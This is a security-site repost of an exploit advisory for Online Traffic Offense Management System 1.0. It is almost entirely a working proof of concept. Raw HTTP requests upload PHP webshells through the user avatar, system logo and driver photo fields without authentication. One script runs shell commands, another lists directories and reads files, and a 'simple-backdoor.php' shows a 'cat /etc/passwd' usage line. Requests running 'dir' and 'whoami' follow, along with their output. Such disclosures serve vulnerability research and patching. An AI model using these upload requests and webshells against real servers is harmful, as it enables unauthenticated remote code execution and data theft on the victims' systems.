Exploit/Advisories no image

Published on October 7th, 2021 📆 | 2722 Views ⚑

0

Online Traffic Offense Management System 1.0 Shell Upload – Torchsec


Text to Speech Voices

# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### RCE - Remote Code Execution

# All requests can be sent by both an authenticated and a non-authenticated user

# RCE - we can exploit the RCE vulnerability in several ways:

* Drivers List can add any attachment as photo - http://localhost/traffic_offense/classes/Master.php?f=save_driver

* System information file add as system logo or portal cover - http://localhost/traffic_offense/admin/?page=system_info

* User profile edit avatar - http://localhost/traffic_offense/admin/?page=user

* Make new user and add evil avatar - http://localhost/traffic_offense/admin/?page=user/manage_user

* Edit other user and change his avatar to webshell - http://localhost/traffic_offense/admin/?page=user/manage_user&id=2

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------

## Example 1

# Request send as Unauthenticated user

POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685
Content-Length: 1184
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=user/manage_user
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="id"

-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="firstname"

hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="lastname"

hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="username"

hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="password"

hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="type"

1
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="img"; filename="cmd.php"
Content-Type: application/octet-stream




< ?php
if($_REQUEST['x']) {
system($_REQUEST['x']);
} else phpinfo();
?>

-----------------------------210106920639395210803657370685--

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 07:59:24 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Set-Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

1

-----------------------------------------------------------------------------------------------------------------------
# The file was uploaded to the uploads directory
# Request to list files in uploads

GET /traffic_offense/uploads/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:06:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 2139
Content-Type: text/html;charset=UTF-8

< !DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">


Index of /traffic_offense/uploads

Index of /traffic_offense/uploads

[...]

[ICO] Name Last modified Size Description
[PARENTDIR] Parent Directory   -  
[IMG] 1629336240_avatar.jpg 2021-08-19 09:24 11K  
[IMG] 1629421080_tl-logo.png 2021-08-20 08:58 5.2K  
[IMG] 1633584660_xss.svg 2021-10-07 07:31 3.4K  
[TXT] 1633593540_cmd.php

-----------------------------------------------------------------------------------------------------------------------
# Request to webshell

GET /traffic_offense/uploads/1633593540_cmd.php?x=dir HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:10:10 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 810
Connection: close
Content-Type: text/html; charset=UTF-8




Volume in drive C has no label.
Volume Serial Number is 283C-C6A0

Directory of C:xampphtdocstraffic_offenseuploads

07.10.2021 10:09

.
07.10.2021 10:09 ..
19.08.2021 09:24 11ÿ426 1629336240_avatar.jpg
20.08.2021 08:58 5ÿ288 1629421080_tl-logo.png
07.10.2021 07:31 3ÿ451 1633584660_xss.svg
07.10.2021 09:59 252 1633593540_cmd.php
07.10.2021 10:02 252 1633593720_cmd.php
07.10.2021 09:02 drivers
5 File(s) 20ÿ669 bytes
3 Dir(s) 86ÿ494ÿ085ÿ120 bytes free

-----------------------------------------------------------------------------------------------------------------------

## Example 2

# Webshell as System Logo and next webshell as Potal Cover in System Information page

# Request

POST /traffic_offense/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------339921602532596419562348365833
Content-Length: 3176
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=system_info
Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="name"

Online Traffic Offense Management System - PHP
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="short_name"

OTOMS - PHP
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="about_us"





About Us

Sample only

-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream

-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="img"; filename="cmd.php"
Content-Type: application/octet-stream




< ?php
if($_REQUEST['x']) {
system($_REQUEST['x']);
} else phpinfo();
?>

-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="cover"; filename="list.php"
Content-Type: application/octet-stream

< ?php

if($_GET['file']) {
$fichero=$_GET['file'];
} else {
$fichero="/";
}

if($handle = @opendir($fichero)) {
while($filename = readdir($handle)) {
echo "( ) " . $filename . "
";
}
closedir($handle);
} else {
echo "FILE: " . $fichero . "

";
$fp = fopen($fichero, "r");
$buffer = fread($fp, filesize($fichero));
echo $buffer;
fclose($fp);
}

?>
-----------------------------339921602532596419562348365833--

-----------------------------------------------------------------------------------------------------------------------

# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:21:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

1

-----------------------------------------------------------------------------------------------------------------------

# The situation is the same as in the previous variant. Two files ripped into the uploads directory, 1633595040_list.php and 1633595040_cmd.php

## Example 3

# Webshell as photo in driver list page

# Request

POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------12210274961293066124133837204
Content-Length: 2148
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver
Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="id"

-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="license_id_no"

vvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="lastname"

vvvvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="firstname"

vvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="middlename"

vvvvvvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="dob"

2021-10-07
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="present_address"

vvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="permanent_address"

vvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="civil_status"

Single
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="nationality"

vvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="contact"

vvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="license_type"

Student
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="image_path"

-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="img"; filename="simple-backdoor.php"
Content-Type: application/octet-stream

< ?php

if(isset($_REQUEST['cmd'])){
echo "

";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "

";
die;
}

?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

-----------------------------12210274961293066124133837204--

-----------------------------------------------------------------------------------------------------------------------

# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:35:21 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

{"status":"success"}

-----------------------------------------------------------------------------------------------------------------------

# Request to webshell

GET /traffic_offense/uploads/drivers/19.php?cmd=whoami HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

-----------------------------------------------------------------------------------------------------------------------

# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:39:15 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 95
Connection: close
Content-Type: text/html; charset=UTF-8

desktop-uhrf0c6hubert

Source link

Tagged with:



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑